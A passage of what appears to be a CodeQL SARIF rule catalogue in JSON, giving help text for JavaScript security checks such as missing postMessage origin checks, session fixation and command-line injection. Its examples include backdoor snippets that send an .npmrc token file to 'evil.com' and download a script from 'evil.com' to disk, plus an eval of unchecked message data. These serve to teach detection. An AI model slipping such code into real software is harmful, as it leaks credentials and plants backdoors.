Example\nThe example below uses a received message to execute some code. However, the origin of the message is not checked, so it might be possible for an attacker to execute arbitrary code.\n\n\n```javascript\nfunction postMessageHandler(event) {\n let origin = event.origin.toLowerCase();\n\n console.log(origin)\n // BAD: the origin property is not checked\n eval(event.data);\n}\n\nwindow.addEventListener('message', postMessageHandler, false);\n\n```\nThe example is fixed below, where the origin is checked to be trusted. It is therefore not possible for a malicious user to perform an attack using an untrusted origin.\n\n\n```javascript\nfunction postMessageHandler(event) {\n console.log(event.origin)\n // GOOD: the origin property is checked\n if (event.origin === 'https://www.example.com') {\n // do something\n }\n}\n\nwindow.addEventListener('message', postMessageHandler, false);\n```\n\n## References\n* [Window.postMessage()](https://developer.mozilla.org/en-US/docs/Web/API/Window/postMessage).\n* [Web message manipulation](https://portswigger.net/web-security/dom-based/web-message-manipulation).\n* [The pitfalls of postMessage](https://labs.detectify.com/2016/12/08/the-pitfalls-of-postmessage/).\n* Common Weakness Enumeration: [CWE-20](https://cwe.mitre.org/data/definitions/20.html).\n* Common Weakness Enumeration: [CWE-940](https://cwe.mitre.org/data/definitions/940.html).\n", + "markdown" : "# Missing origin verification in `postMessage` handler\nThe `\"message\"` event is used to send messages between windows. An untrusted window can send a message to a trusted window, and it is up to the receiver to verify the legitimacy of the message. One way of performing that verification is to check the `origin` of the message ensure that it originates from a trusted window.\n\n\n## Recommendation\nAlways verify the origin of incoming messages.\n\n\n## Example\nThe example below uses a received message to execute some code. However, the origin of the message is not checked, so it might be possible for an attacker to execute arbitrary code.\n\n\n```javascript\nfunction postMessageHandler(event) {\n let origin = event.origin.toLowerCase();\n\n console.log(origin)\n // BAD: the origin property is not checked\n eval(event.data);\n}\n\nwindow.addEventListener('message', postMessageHandler, false);\n\n```\nThe example is fixed below, where the origin is checked to be trusted. It is therefore not possible for a malicious user to perform an attack using an untrusted origin.\n\n\n```javascript\nfunction postMessageHandler(event) {\n console.log(event.origin)\n // GOOD: the origin property is checked\n if (event.origin === 'https://www.example.com') {\n // do something\n }\n}\n\nwindow.addEventListener('message', postMessageHandler, false);\n```\n\n## References\n* [Window.postMessage()](https://developer.mozilla.org/en-US/docs/Web/API/Window/postMessage).\n* [Web message manipulation](https://portswigger.net/web-security/dom-based/web-message-manipulation).\n* [The pitfalls of postMessage](https://labs.detectify.com/2016/12/08/the-pitfalls-of-postmessage/).\n* Common Weakness Enumeration: [CWE-20](https://cwe.mitre.org/data/definitions/20.html).\n* Common Weakness Enumeration: [CWE-940](https://cwe.mitre.org/data/definitions/940.html).\n" + }, + "properties" : { + "tags" : [ "correctness", "security", "external/cwe/cwe-020", "external/cwe/cwe-940" ], + "description" : "Missing origin verification in a `postMessage` handler allows any windows to send arbitrary data to the handler.", + "id" : "js/missing-origin-check", + "kind" : "problem", + "name" : "Missing origin verification in `postMessage` handler", + "precision" : "medium", + "problem.severity" : "warning", + "security-severity" : "5" + } + }, { + "id" : "js/file-access-to-http", + "name" : "js/file-access-to-http", + "shortDescription" : { + "text" : "File data in outbound network request" + }, + "fullDescription" : { + "text" : "Directly sending file data in an outbound network request can indicate unauthorized information disclosure." + }, + "defaultConfiguration" : { + "enabled" : true, + "level" : "warning" + }, + "help" : { + "text" : "# File data in outbound network request\nSending local file system data to a remote URL without further validation risks uncontrolled information exposure, and may be an indication of malicious backdoor code that has been implanted into an otherwise trusted code base.\n\n\n## Recommendation\nExamine the highlighted code closely to ensure that it is behaving as intended.\n\n\n## Example\nThe following example is adapted from backdoor code that was identified in two popular npm packages. It reads the contents of the `.npmrc` file (which may contain secret npm tokens) and sends it to a remote server by embedding it into an HTTP request header.\n\n\n```javascript\nvar fs = require(\"fs\"),\n https = require(\"https\");\n\nvar content = fs.readFileSync(\".npmrc\", \"utf8\");\nhttps.get({\n hostname: \"evil.com\",\n path: \"/upload\",\n method: \"GET\",\n headers: { Referer: content }\n}, () => { });\n\n```\n\n## References\n* ESLint Blog: [Postmortem for Malicious Packages Published on July 12th, 2018](https://eslint.org/blog/2018/07/postmortem-for-malicious-package-publishes).\n* OWASP: [Sensitive Data Exposure](https://www.owasp.org/index.php/Top_10-2017_A3-Sensitive_Data_Exposure).\n* OWASP: [Trojan Horse](https://www.owasp.org/index.php/Trojan_Horse).\n* Common Weakness Enumeration: [CWE-200](https://cwe.mitre.org/data/definitions/200.html).\n", + "markdown" : "# File data in outbound network request\nSending local file system data to a remote URL without further validation risks uncontrolled information exposure, and may be an indication of malicious backdoor code that has been implanted into an otherwise trusted code base.\n\n\n## Recommendation\nExamine the highlighted code closely to ensure that it is behaving as intended.\n\n\n## Example\nThe following example is adapted from backdoor code that was identified in two popular npm packages. It reads the contents of the `.npmrc` file (which may contain secret npm tokens) and sends it to a remote server by embedding it into an HTTP request header.\n\n\n```javascript\nvar fs = require(\"fs\"),\n https = require(\"https\");\n\nvar content = fs.readFileSync(\".npmrc\", \"utf8\");\nhttps.get({\n hostname: \"evil.com\",\n path: \"/upload\",\n method: \"GET\",\n headers: { Referer: content }\n}, () => { });\n\n```\n\n## References\n* ESLint Blog: [Postmortem for Malicious Packages Published on July 12th, 2018](https://eslint.org/blog/2018/07/postmortem-for-malicious-package-publishes).\n* OWASP: [Sensitive Data Exposure](https://www.owasp.org/index.php/Top_10-2017_A3-Sensitive_Data_Exposure).\n* OWASP: [Trojan Horse](https://www.owasp.org/index.php/Trojan_Horse).\n* Common Weakness Enumeration: [CWE-200](https://cwe.mitre.org/data/definitions/200.html).\n" + }, + "properties" : { + "tags" : [ "security", "external/cwe/cwe-200" ], + "description" : "Directly sending file data in an outbound network request can indicate unauthorized information disclosure.", + "id" : "js/file-access-to-http", + "kind" : "path-problem", + "name" : "File data in outbound network request", + "precision" : "medium", + "problem.severity" : "warning", + "security-severity" : "6.5" + } + }, { + "id" : "js/session-fixation", + "name" : "js/session-fixation", + "shortDescription" : { + "text" : "Failure to abandon session" + }, + "fullDescription" : { + "text" : "Reusing an existing session as a different user could allow an attacker to access someone else's account by using their session." + }, + "defaultConfiguration" : { + "enabled" : true, + "level" : "warning" + }, + "help" : { + "text" : "# Failure to abandon session\nReusing a session could allow an attacker to gain unauthorized access to another account. Always ensure that, when a user logs in or out, the current session is abandoned so that a new session may be started.\n\n\n## Recommendation\nAlways use `req.session.regenerate(...);` to start a new session when a user logs in or out.\n\n\n## Example\nThe following example shows the previous session being used after authentication. This would allow a previous user to use the new user's account.\n\n\n```javascript\nconst express = require('express');\nconst session = require('express-session');\nvar bodyParser = require('body-parser')\nconst app = express();\napp.use(bodyParser.urlencoded({ extended: false }))\napp.use(session({\n secret: 'keyboard cat'\n}));\n\napp.post('/login', function (req, res) {\n // Check that username password matches\n if (req.body.username === 'admin' && req.body.password === 'admin') {\n req.session.authenticated = true;\n res.redirect('/');\n } else {\n res.redirect('/login');\n }\n});\n```\nThis code example solves the problem by not reusing the session, and instead calling `req.session.regenerate()` to ensure that the session is not reused.\n\n\n```javascript\nconst express = require('express');\nconst session = require('express-session');\nvar bodyParser = require('body-parser')\nconst app = express();\napp.use(bodyParser.urlencoded({ extended: false }))\napp.use(session({\n secret: 'keyboard cat'\n}));\n\napp.post('/login', function (req, res) {\n // Check that username password matches\n if (req.body.username === 'admin' && req.body.password === 'admin') {\n req.session.regenerate(function (err) {\n if (err) {\n res.send('Error');\n } else {\n req.session.authenticated = true;\n res.redirect('/');\n }\n });\n } else {\n res.redirect('/login');\n }\n});\n```\n\n## References\n* OWASP: [Session fixation](https://www.owasp.org/index.php/Session_fixation)\n* Stack Overflow: [Creating a new session after authentication with Passport](https://stackoverflow.com/questions/22209354/creating-a-new-session-after-authentication-with-passport/30468384#30468384)\n* jscrambler.com: [Best practices for secure session management in Node](https://blog.jscrambler.com/best-practices-for-secure-session-management-in-node)\n* Common Weakness Enumeration: [CWE-384](https://cwe.mitre.org/data/definitions/384.html).\n", + "markdown" : "# Failure to abandon session\nReusing a session could allow an attacker to gain unauthorized access to another account. Always ensure that, when a user logs in or out, the current session is abandoned so that a new session may be started.\n\n\n## Recommendation\nAlways use `req.session.regenerate(...);` to start a new session when a user logs in or out.\n\n\n## Example\nThe following example shows the previous session being used after authentication. This would allow a previous user to use the new user's account.\n\n\n```javascript\nconst express = require('express');\nconst session = require('express-session');\nvar bodyParser = require('body-parser')\nconst app = express();\napp.use(bodyParser.urlencoded({ extended: false }))\napp.use(session({\n secret: 'keyboard cat'\n}));\n\napp.post('/login', function (req, res) {\n // Check that username password matches\n if (req.body.username === 'admin' && req.body.password === 'admin') {\n req.session.authenticated = true;\n res.redirect('/');\n } else {\n res.redirect('/login');\n }\n});\n```\nThis code example solves the problem by not reusing the session, and instead calling `req.session.regenerate()` to ensure that the session is not reused.\n\n\n```javascript\nconst express = require('express');\nconst session = require('express-session');\nvar bodyParser = require('body-parser')\nconst app = express();\napp.use(bodyParser.urlencoded({ extended: false }))\napp.use(session({\n secret: 'keyboard cat'\n}));\n\napp.post('/login', function (req, res) {\n // Check that username password matches\n if (req.body.username === 'admin' && req.body.password === 'admin') {\n req.session.regenerate(function (err) {\n if (err) {\n res.send('Error');\n } else {\n req.session.authenticated = true;\n res.redirect('/');\n }\n });\n } else {\n res.redirect('/login');\n }\n});\n```\n\n## References\n* OWASP: [Session fixation](https://www.owasp.org/index.php/Session_fixation)\n* Stack Overflow: [Creating a new session after authentication with Passport](https://stackoverflow.com/questions/22209354/creating-a-new-session-after-authentication-with-passport/30468384#30468384)\n* jscrambler.com: [Best practices for secure session management in Node](https://blog.jscrambler.com/best-practices-for-secure-session-management-in-node)\n* Common Weakness Enumeration: [CWE-384](https://cwe.mitre.org/data/definitions/384.html).\n" + }, + "properties" : { + "tags" : [ "security", "external/cwe/cwe-384" ], + "description" : "Reusing an existing session as a different user could allow\n an attacker to access someone else's account by using\n their session.", + "id" : "js/session-fixation", + "kind" : "problem", + "name" : "Failure to abandon session", + "precision" : "medium", + "problem.severity" : "warning", + "security-severity" : "5" + } + }, { + "id" : "js/client-side-request-forgery", + "name" : "js/client-side-request-forgery", + "shortDescription" : { + "text" : "Client-side request forgery" + }, + "fullDescription" : { + "text" : "Making a client-to-server request with user-controlled data in the URL allows a request forgery attack against the client." + }, + "defaultConfiguration" : { + "enabled" : true, + "level" : "error" + }, + "help" : { + "text" : "# Client-side request forgery\nDirectly incorporating user input in the URL of an outgoing HTTP request can enable a request forgery attack, in which the request is altered to target an unintended API endpoint or resource. A client-side forged request may perform an unwanted action affecting the victim's account, or may lead to cross-site scripting if the request response is handled in an unsafe way. This is different from CSRF (cross-site request forgery), and will usually bypass CSRF protections. This is usually less severe than SSRF (server-side request forgery), as it does not expose internal services.\n\n\n## Recommendation\nRestrict user inputs in the URL of an outgoing request, in particular:\n\n* Avoid user input in the hostname of the URL. Pick the hostname from an allow-list instead of constructing it directly from user input.\n* Take care when user input is part of the pathname of the URL. Restrict the input so that path traversal (\"`../`\") cannot be used to redirect the request to an unintended endpoint.\n\n## Example\nThe following example shows an HTTP request used to fetch the pre-rendered HTML body of a message. It is using the endpoint `/api/messages/ID`, which is believed to respond with a safe HTML string, to be embedded in the page:\n\n\n```javascript\nasync function loadMessage() {\n const query = new URLSearchParams(location.search);\n const url = '/api/messages/' + query.get('message_id');\n const data = await (await fetch(url)).json();\n document.getElementById('message').innerHTML = data.html;\n}\n\n```\nHowever, the format of the message ID is not checked, and an attacker can abuse this to alter the endpoint targeted by the request. If they can redirect it to an endpoint that returns an untrusted value, this leads to cross-site scripting.\n\nFor example, given the query string `message_id=../pastebin/123`, the request will end up targeting the `/api/pastebin` endpoint. Or if there is an open redirect on the login page, a query string like `message_id=../../login?redirect_url=https://evil.com` could give the attacker full control over the response as well.\n\nIn example below, the input has been restricted to a number so that the endpoint cannot be altered:\n\n\n```javascript\nasync function loadMessage() {\n const query = new URLSearchParams(location.search);\n const url = '/api/messages/' + Number(query.get('message_id'));\n const data = await (await fetch(url)).json();\n document.getElementById('message').innerHTML = data.html;\n}\n\n```\n\n## References\n* OWASP: [Server-side request forgery](https://cwe.mitre.org/data/definitions/918.html)\n* OWASP: [Cross-site request forgery](https://cwe.mitre.org/data/definitions/352.html)\n* Common Weakness Enumeration: [CWE-918](https://cwe.mitre.org/data/definitions/918.html).\n", + "markdown" : "# Client-side request forgery\nDirectly incorporating user input in the URL of an outgoing HTTP request can enable a request forgery attack, in which the request is altered to target an unintended API endpoint or resource. A client-side forged request may perform an unwanted action affecting the victim's account, or may lead to cross-site scripting if the request response is handled in an unsafe way. This is different from CSRF (cross-site request forgery), and will usually bypass CSRF protections. This is usually less severe than SSRF (server-side request forgery), as it does not expose internal services.\n\n\n## Recommendation\nRestrict user inputs in the URL of an outgoing request, in particular:\n\n* Avoid user input in the hostname of the URL. Pick the hostname from an allow-list instead of constructing it directly from user input.\n* Take care when user input is part of the pathname of the URL. Restrict the input so that path traversal (\"`../`\") cannot be used to redirect the request to an unintended endpoint.\n\n## Example\nThe following example shows an HTTP request used to fetch the pre-rendered HTML body of a message. It is using the endpoint `/api/messages/ID`, which is believed to respond with a safe HTML string, to be embedded in the page:\n\n\n```javascript\nasync function loadMessage() {\n const query = new URLSearchParams(location.search);\n const url = '/api/messages/' + query.get('message_id');\n const data = await (await fetch(url)).json();\n document.getElementById('message').innerHTML = data.html;\n}\n\n```\nHowever, the format of the message ID is not checked, and an attacker can abuse this to alter the endpoint targeted by the request. If they can redirect it to an endpoint that returns an untrusted value, this leads to cross-site scripting.\n\nFor example, given the query string `message_id=../pastebin/123`, the request will end up targeting the `/api/pastebin` endpoint. Or if there is an open redirect on the login page, a query string like `message_id=../../login?redirect_url=https://evil.com` could give the attacker full control over the response as well.\n\nIn example below, the input has been restricted to a number so that the endpoint cannot be altered:\n\n\n```javascript\nasync function loadMessage() {\n const query = new URLSearchParams(location.search);\n const url = '/api/messages/' + Number(query.get('message_id'));\n const data = await (await fetch(url)).json();\n document.getElementById('message').innerHTML = data.html;\n}\n\n```\n\n## References\n* OWASP: [Server-side request forgery](https://cwe.mitre.org/data/definitions/918.html)\n* OWASP: [Cross-site request forgery](https://cwe.mitre.org/data/definitions/352.html)\n* Common Weakness Enumeration: [CWE-918](https://cwe.mitre.org/data/definitions/918.html).\n" + }, + "properties" : { + "tags" : [ "security", "external/cwe/cwe-918" ], + "description" : "Making a client-to-server request with user-controlled data in the URL allows a request forgery attack\n against the client.", + "id" : "js/client-side-request-forgery", + "kind" : "path-problem", + "name" : "Client-side request forgery", + "precision" : "medium", + "problem.severity" : "error", + "security-severity" : "5.0" + } + }, { + "id" : "js/remote-property-injection", + "name" : "js/remote-property-injection", + "shortDescription" : { + "text" : "Remote property injection" + }, + "fullDescription" : { + "text" : "Allowing writes to arbitrary properties of an object may lead to denial-of-service attacks." + }, + "defaultConfiguration" : { + "enabled" : true, + "level" : "warning" + }, + "help" : { + "text" : "# Remote property injection\nDynamically computing object property names from untrusted input may have multiple undesired consequences. For example, if the property access is used as part of a write, an attacker may overwrite vital properties of objects, such as `__proto__`. This attack is known as *prototype pollution attack* and may serve as a vehicle for denial-of-service attacks. A similar attack vector, is to replace the `toString` property of an object with a primitive. Whenever `toString` is then called on that object, either explicitly or implicitly as part of a type coercion, an exception will be raised.\n\nMoreover, if the name of an HTTP header is user-controlled, an attacker may exploit this to overwrite security-critical headers such as `Access-Control-Allow-Origin` or `Content-Security-Policy`.\n\n\n## Recommendation\nThe most common case in which prototype pollution vulnerabilities arise is when JavaScript objects are used for implementing map data structures. This case should be avoided whenever possible by using the ECMAScript 2015 `Map` instead. When this is not possible, an alternative fix is to prepend untrusted input with a marker character such as `$`, before using it in properties accesses. In this way, the attacker does not have access to built-in properties which do not start with the chosen character.\n\nWhen using user input as part of a header name, a sanitization step should be performed on the input to ensure that the name does not clash with existing header names such as `Content-Security-Policy`.\n\n\n## Example\nIn the example below, the dynamically computed property `prop` is accessed on `myObj` using a user-controlled value.\n\n\n```javascript\nvar express = require('express');\n\nvar app = express();\nvar myObj = {}\n\napp.get('/user/:id', function(req, res) {\n\tvar prop = req.query.userControlled; // BAD\n\tmyObj[prop] = function() {};\n\tconsole.log(\"Request object \" + myObj);\n});\n```\nThis is not secure since an attacker may exploit this code to overwrite the property `__proto__` with an empty function. If this happens, the concatenation in the `console.log` argument will fail with a confusing message such as \"Function.prototype.toString is not generic\". If the application does not properly handle this error, this scenario may result in a serious denial-of-service attack. The fix is to prepend the user-controlled string with a marker character such as `$` which will prevent arbitrary property names from being overwritten.\n\n\n```javascript\nvar express = require('express');\n\nvar app = express();\nvar myObj = {}\n\napp.get('/user/:id', function(req, res) {\n\tvar prop = \"$\" + req.query.userControlled; // GOOD\n\tmyObj[prop] = function() {};\n\tconsole.log(\"Request object \" + myObj);\n});\n```\n\n## References\n* Prototype pollution attacks: [electron](https://github.com/electron/electron/pull/9287), [lodash](https://hackerone.com/reports/310443), [hoek](https://npmjs.com/advisories/566).\n* Penetration testing report: [ header name injection attack](http://seclists.org/pen-test/2009/Mar/67)\n* npm blog post: [ dangers of square bracket notation](https://github.com/nodesecurity/eslint-plugin-security/blob/3c7522ca1be800353513282867a1034c795d9eb4/docs/the-dangers-of-square-bracket-notation.md)\n* Common Weakness Enumeration: [CWE-250](https://cwe.mitre.org/data/definitions/250.html).\n* Common Weakness Enumeration: [CWE-400](https://cwe.mitre.org/data/definitions/400.html).\n", + "markdown" : "# Remote property injection\nDynamically computing object property names from untrusted input may have multiple undesired consequences. For example, if the property access is used as part of a write, an attacker may overwrite vital properties of objects, such as `__proto__`. This attack is known as *prototype pollution attack* and may serve as a vehicle for denial-of-service attacks. A similar attack vector, is to replace the `toString` property of an object with a primitive. Whenever `toString` is then called on that object, either explicitly or implicitly as part of a type coercion, an exception will be raised.\n\nMoreover, if the name of an HTTP header is user-controlled, an attacker may exploit this to overwrite security-critical headers such as `Access-Control-Allow-Origin` or `Content-Security-Policy`.\n\n\n## Recommendation\nThe most common case in which prototype pollution vulnerabilities arise is when JavaScript objects are used for implementing map data structures. This case should be avoided whenever possible by using the ECMAScript 2015 `Map` instead. When this is not possible, an alternative fix is to prepend untrusted input with a marker character such as `$`, before using it in properties accesses. In this way, the attacker does not have access to built-in properties which do not start with the chosen character.\n\nWhen using user input as part of a header name, a sanitization step should be performed on the input to ensure that the name does not clash with existing header names such as `Content-Security-Policy`.\n\n\n## Example\nIn the example below, the dynamically computed property `prop` is accessed on `myObj` using a user-controlled value.\n\n\n```javascript\nvar express = require('express');\n\nvar app = express();\nvar myObj = {}\n\napp.get('/user/:id', function(req, res) {\n\tvar prop = req.query.userControlled; // BAD\n\tmyObj[prop] = function() {};\n\tconsole.log(\"Request object \" + myObj);\n});\n```\nThis is not secure since an attacker may exploit this code to overwrite the property `__proto__` with an empty function. If this happens, the concatenation in the `console.log` argument will fail with a confusing message such as \"Function.prototype.toString is not generic\". If the application does not properly handle this error, this scenario may result in a serious denial-of-service attack. The fix is to prepend the user-controlled string with a marker character such as `$` which will prevent arbitrary property names from being overwritten.\n\n\n```javascript\nvar express = require('express');\n\nvar app = express();\nvar myObj = {}\n\napp.get('/user/:id', function(req, res) {\n\tvar prop = \"$\" + req.query.userControlled; // GOOD\n\tmyObj[prop] = function() {};\n\tconsole.log(\"Request object \" + myObj);\n});\n```\n\n## References\n* Prototype pollution attacks: [electron](https://github.com/electron/electron/pull/9287), [lodash](https://hackerone.com/reports/310443), [hoek](https://npmjs.com/advisories/566).\n* Penetration testing report: [ header name injection attack](http://seclists.org/pen-test/2009/Mar/67)\n* npm blog post: [ dangers of square bracket notation](https://github.com/nodesecurity/eslint-plugin-security/blob/3c7522ca1be800353513282867a1034c795d9eb4/docs/the-dangers-of-square-bracket-notation.md)\n* Common Weakness Enumeration: [CWE-250](https://cwe.mitre.org/data/definitions/250.html).\n* Common Weakness Enumeration: [CWE-400](https://cwe.mitre.org/data/definitions/400.html).\n" + }, + "properties" : { + "tags" : [ "security", "external/cwe/cwe-250", "external/cwe/cwe-400" ], + "description" : "Allowing writes to arbitrary properties of an object may lead to\n denial-of-service attacks.", + "id" : "js/remote-property-injection", + "kind" : "path-problem", + "name" : "Remote property injection", + "precision" : "medium", + "problem.severity" : "warning", + "security-severity" : "7.5" + } + }, { + "id" : "js/http-to-file-access", + "name" : "js/http-to-file-access", + "shortDescription" : { + "text" : "Network data written to file" + }, + "fullDescription" : { + "text" : "Writing network data directly to the file system allows arbitrary file upload and might indicate a backdoor." + }, + "defaultConfiguration" : { + "enabled" : true, + "level" : "warning" + }, + "help" : { + "text" : "# Network data written to file\nStoring user-controlled data on the local file system without further validation allows arbitrary file upload, and may be an indication of malicious backdoor code that has been implanted into an otherwise trusted code base.\n\n\n## Recommendation\nExamine the highlighted code closely to ensure that it is behaving as intended.\n\n\n## Example\nThe following example shows backdoor code that downloads data from the URL `https://evil.com/script`, and stores it in the local file `/tmp/script`.\n\n\n```javascript\nvar https = require(\"https\");\nvar fs = require(\"fs\");\n\nhttps.get('https://evil.com/script', res => {\n res.on(\"data\", d => {\n fs.writeFileSync(\"/tmp/script\", d)\n })\n});\n\n```\nOther parts of the program might then assume that since `/tmp/script` is a local file its contents can be trusted, while in fact they are obtained from an untrusted remote source.\n\n\n## References\n* OWASP: [Trojan Horse](https://www.owasp.org/index.php/Trojan_Horse).\n* OWASP: [Unrestricted File Upload](https://www.owasp.org/index.php/Unrestricted_File_Upload).\n* Common Weakness Enumeration: [CWE-912](https://cwe.mitre.org/data/definitions/912.html).\n* Common Weakness Enumeration: [CWE-434](https://cwe.mitre.org/data/definitions/434.html).\n", + "markdown" : "# Network data written to file\nStoring user-controlled data on the local file system without further validation allows arbitrary file upload, and may be an indication of malicious backdoor code that has been implanted into an otherwise trusted code base.\n\n\n## Recommendation\nExamine the highlighted code closely to ensure that it is behaving as intended.\n\n\n## Example\nThe following example shows backdoor code that downloads data from the URL `https://evil.com/script`, and stores it in the local file `/tmp/script`.\n\n\n```javascript\nvar https = require(\"https\");\nvar fs = require(\"fs\");\n\nhttps.get('https://evil.com/script', res => {\n res.on(\"data\", d => {\n fs.writeFileSync(\"/tmp/script\", d)\n })\n});\n\n```\nOther parts of the program might then assume that since `/tmp/script` is a local file its contents can be trusted, while in fact they are obtained from an untrusted remote source.\n\n\n## References\n* OWASP: [Trojan Horse](https://www.owasp.org/index.php/Trojan_Horse).\n* OWASP: [Unrestricted File Upload](https://www.owasp.org/index.php/Unrestricted_File_Upload).\n* Common Weakness Enumeration: [CWE-912](https://cwe.mitre.org/data/definitions/912.html).\n* Common Weakness Enumeration: [CWE-434](https://cwe.mitre.org/data/definitions/434.html).\n" + }, + "properties" : { + "tags" : [ "security", "external/cwe/cwe-912", "external/cwe/cwe-434" ], + "description" : "Writing network data directly to the file system allows arbitrary file upload and might indicate a backdoor.", + "id" : "js/http-to-file-access", + "kind" : "path-problem", + "name" : "Network data written to file", + "precision" : "medium", + "problem.severity" : "warning", + "security-severity" : "6.3" + } + }, { + "id" : "js/indirect-command-line-injection", + "name" : "js/indirect-command-line-injection", + "shortDescription" : { + "text" : "Indirect uncontrolled command line" + }, + "fullDescription" : { + "text" : "Forwarding command-line arguments to a child process executed within a shell may indirectly introduce command-line injection vulnerabilities." + }, + "defaultConfiguration" : { + "enabled" : true, + "level" : "warning" + }, + "help" : { + "text" : "# Indirect uncontrolled command line\nForwarding command-line arguments to `child_process.exec` or some other library routine that executes a system command within a shell can change the meaning of the command unexpectedly due to unescaped special characters.\n\nWhen the forwarded command-line arguments come from a parent process that has not escaped the special characters in the arguments, then the parent process may indirectly be vulnerable to command-line injection since the special characters are evaluated unexpectedly.\n\n\n## Recommendation\nIf possible, use APIs that don't run shell commands and accept command arguments as an array of strings rather than a single concatenated string. This is both safer and more portable.\n\nIf given arguments as a single string, avoid simply splitting the string on whitespace. Arguments may contain quoted whitespace, causing them to split into multiple arguments. Use a library like `shell-quote` to parse the string into an array of arguments instead.\n\nIf this approach is not viable, then add code to verify that each forwarded command-line argument is properly escaped before using it.\n\n\n## Example\nThe following wrapper script example executes another JavaScript file in a child process and forwards some command-line arguments. This is problematic because the special characters in the command-line arguments may change the meaning of the child process invocation unexpectedly. For instance, if one of the command-line arguments is `\"dollar$separated$name\"`, then the child process will substitute the two environment variables `$separated` and `$name` before invoking `node`.\n\n\n```javascript\nvar cp = require(\"child_process\");\n\nconst args = process.argv.slice(2);\nconst script = path.join(__dirname, 'bin', 'main.js');\ncp.execSync(`node ${script} ${args.join(' ')}`); // BAD\n\n```\nIf another program uses `child_process.execFile` to invoke the above wrapper script with input from a remote user, then there may be a command-line injection vulnerability. This may be surprising, since a command-line invocation with `child_process.execFile` is generally considered safe. But in this case, the remote user input is simply forwarded to the problematic `process.exec` call in the wrapper script.\n\nTo guard against this, use an API that does not perform environment variable substitution, such as `child_process.execFile`:\n\n\n```javascript\nvar cp = require(\"child_process\");\n\nconst args = process.argv.slice(2);\nconst script = path.join(__dirname, 'bin', 'main.js');\ncp.execFileSync('node', [script].concat(args)); // GOOD\n\n```\nIf you want to allow the user to specify other options to `node`, you can use a library like `shell-quote` to parse the user input into an array of arguments without risking command injection:\n\n\n```javascript\nvar cp = require(\"child_process\"),\n shellQuote = require(\"shell-quote\");\n\nconst args = process.argv.slice(2);\nlet nodeOpts = '';\nif (args[0] === '--node-opts') {\n nodeOpts = args[1];\n args.splice(0, 2);\n}\nconst script = path.join(__dirname, 'bin', 'main.js');\ncp.execFileSync('node', shellQuote.parse(nodeOpts).concat(script).concat(args)); // GOOD\n\n```\n\n## References\n* OWASP: [Command Injection](https://www.owasp.org/index.php/Command_Injection).\n* npm: [shell-quote](https://www.npmjs.com/package/shell-quote).\n* Common Weakness Enumeration: [CWE-78](https://cwe.mitre.org/data/definitions/78.html).\n* Common Weakness Enumeration: [CWE-88](https://cwe.mitre.org/data/definitions/88.html).\n", + "markdown" : "# Indirect uncontrolled command line\nForwarding command-line arguments to `child_process.exec` or some other library routine that executes a system command within a shell can change the meaning of the command unexpectedly due to unescaped special characters.\n\nWhen the forwarded command-line arguments come from a parent process that has not escaped the special characters in the arguments, then the parent process may indirectly be vulnerable to command-line injection since the special characters are evaluated unexpectedly.\n\n\n## Recommendation\nIf possible, use APIs that don't run shell commands and accept command arguments as an array of strings rather than a single concatenated string. This is both safer and more portable.\n\nIf given arguments as a single string, avoid simply splitting the string on whitespace. Arguments may contain quoted whitespace, causing them to split into multiple arguments. Use a library like `shell-quote` to parse the string into an array of arguments instead.\n\nIf this approach is not viable, then add code to verify that each forwarded command-line argument is properly escaped before using it.\n\n\n## Example\nThe following wrapper script example executes another JavaScript file in a child process and forwards some command-line arguments. This is problematic because the special characters in the command-line arguments may change the meaning of the child process invocation unexpectedly. For instance, if one of the command-line arguments is `\"dollar$separated$name\"`, then the child process will substitute the two environment variables `$separated` and `$name` before invoking `node`.\n\n\n```javascript\nvar cp = require(\"child_process\");\n\nconst args = process.argv.slice(2);\nconst script = path.join(__dirname, 'bin', 'main.js');\ncp.execSync(`node ${script} ${args.join(' ')}`); // BAD\n\n```\nIf another program uses `child_process.execFile` to invoke the above wrapper script with input from a remote user, then there may be a command-line injection vulnerability. This may be surprising, since a command-line invocation with `child_process.execFile` is generally considered safe. But in this case, the remote user input is simply forwarded to the problematic `process.exec` call in the wrapper script.\n\nTo guard against this, use an API that does not perform environment variable substitution, such as `child_process.execFile`:\n\n\n```javascript\nvar cp = require(\"child_process\");\n\nconst args = process.argv.slice(2);\nconst script = path.join(__dirname, 'bin', 'main.js');\ncp.execFileSync('node', [script].concat(args)); // GOOD\n\n```\nIf you want to allow the user to specify other options to `node`, you can use a library like `shell-quote` to parse the user input into an array of arguments without risking command injection:\n\n\n```javascript\nvar cp = require(\"child_process\"),\n shellQuote = require(\"shell-quote\");\n\nconst args = process.argv.slice(2);\nlet nodeOpts = '';\nif (args[0] === '--node-opts') {\n nodeOpts = args[1];\n args.splice(0, 2);\n}\nconst script = path.join(__dirname, 'bin', 'main.js');\ncp.execFileSync('node', shellQuote.parse(nodeOpts).concat(script).concat(args)); // GOOD\n\n```\n\n## References\n* OWASP: [Command Injection](https://www.owasp.org/index.php/Command_Injection).\n* npm: [shell-quote](https://www.npmjs.com/package/shell-quote).\n* Common Weakness Enumeration: [CWE-78](https://cwe.mitre.org/data/definitions/78.html).\n* Common Weakness Enumeration: [CWE-88](https://cwe.mitre.org/data/definitions/88.html).\n" + }, + "properties" : { + "tags" : [ "correctness", "security", "external/cwe/cwe-078", "external/cwe/cwe-088" ], + "description" : "Forwarding command-line arguments to a child process\n executed within a shell may indirectly introduce\n command-line injection vulnerabilities.", + "id" : "js/indirect-command-line-injection", + "kind" : "path-problem", + "name" : "Indirect uncontrolled command line", + "precision" : "medium", + "problem.severity" : "warning", + "security-severity" : "6.3" + } + }, { + "id" : "js/log-injection", + "name" : "js/log-injection", + "shortDescription" : { + "text" : "Log injection" + }, + "fullDescription" : { + "text" : "Building log entries from user-controlled sources is vulnerable to insertion of forged log entries by a malicious user." + }, + "defaultConfiguration" : { + "enabled" : true, + "level" : "error" + }, + "help" : { + "text" : "# Log injection\nIf unsanitized user input is written to a log entry, a malicious user may be able to forge new log entries.\n\nForgery can occur if a user provides some input with characters that are interpreted when the log output is displayed. If the log is displayed as a plain text file, then new line characters can be used by a malicious user. If the log is displayed as HTML, then arbitrary HTML may be included to spoof log entries.\n\n\n## Recommendation\nUser input should be suitably sanitized before it is logged.\n\nIf the log entries are in plain text then line breaks should be removed from user input, using `String.prototype.replace` or similar. Care should also be taken that user input is clearly marked in log entries.\n\nFor log entries that will be displayed in HTML, user input should be HTML-encoded before being logged, to prevent forgery and other forms of HTML injection.\n\n\n## Example\nIn the first example, a username, provided by the user, is logged using \\`console.info\\`. In the first case, it is logged without any sanitization. In the second case, the username is used to build an error that is logged using \\`console.error\\`. If a malicious user provides 